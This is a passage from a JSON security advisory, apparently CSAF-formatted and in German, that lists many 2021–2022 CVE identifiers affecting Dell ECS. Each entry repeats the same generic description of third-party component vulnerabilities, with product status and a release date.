"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-3778"
},
{
"cve": "CVE-2021-3796",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-3796"
},
{
"cve": "CVE-2021-3826",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-3826"
},
{
"cve": "CVE-2021-3827",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-3827"
},
{
"cve": "CVE-2021-38297",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-38297"
},
{
"cve": "CVE-2021-3872",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-3872"
},
{
"cve": "CVE-2021-3875",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-3875"
},
{
"cve": "CVE-2021-3903",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-3903"
},
{
"cve": "CVE-2021-3923",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-3923"
},
{
"cve": "CVE-2021-3927",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-3927"
},
{
"cve": "CVE-2021-3928",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-3928"
},
{
"cve": "CVE-2021-3968",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-3968"
},
{
"cve": "CVE-2021-3973",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-3973"
},
{
"cve": "CVE-2021-3974",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-3974"
},
{
"cve": "CVE-2021-3984",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-3984"
},
{
"cve": "CVE-2021-4019",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-4019"
},
{
"cve": "CVE-2021-4037",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-4037"
},
{
"cve": "CVE-2021-4069",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-4069"
},
{
"cve": "CVE-2021-4104",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-4104"
},
{
"cve": "CVE-2021-4136",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-4136"
},
{
"cve": "CVE-2021-4157",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-4157"
},
{
"cve": "CVE-2021-4166",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-4166"
},
{
"cve": "CVE-2021-41771",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-41771"
},
{
"cve": "CVE-2021-4192",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-4192"
},
{
"cve": "CVE-2021-4193",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-4193"
},
{
"cve": "CVE-2021-4203",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-4203"
},
{
"cve": "CVE-2021-42567",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-42567"
},
{
"cve": "CVE-2021-43797",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-43797"
},
{
"cve": "CVE-2021-44531",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-44531"
},
{
"cve": "CVE-2021-44532",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-44532"
},
{
"cve": "CVE-2021-44533",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-44533"
},
{
"cve": "CVE-2021-44716",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-44716"
},
{
"cve": "CVE-2021-44878",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-44878"
},
{
"cve": "CVE-2021-45078",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-45078"
},
{
"cve": "CVE-2021-46195",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-46195"
},
{
"cve": "CVE-2021-46828",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-46828"
},
{
"cve": "CVE-2021-46848",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2021-46848"
},
{
"cve": "CVE-2022-0128",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-0128"
},
{
"cve": "CVE-2022-0213",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-0213"
},
{
"cve": "CVE-2022-0225",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-0225"
},
{
"cve": "CVE-2022-0261",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-0261"
},
{
"cve": "CVE-2022-0318",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-0318"
},
{
"cve": "CVE-2022-0319",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-0319"
},
{
"cve": "CVE-2022-0351",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-0351"
},
{
"cve": "CVE-2022-0359",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-0359"
},
{
"cve": "CVE-2022-0361",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
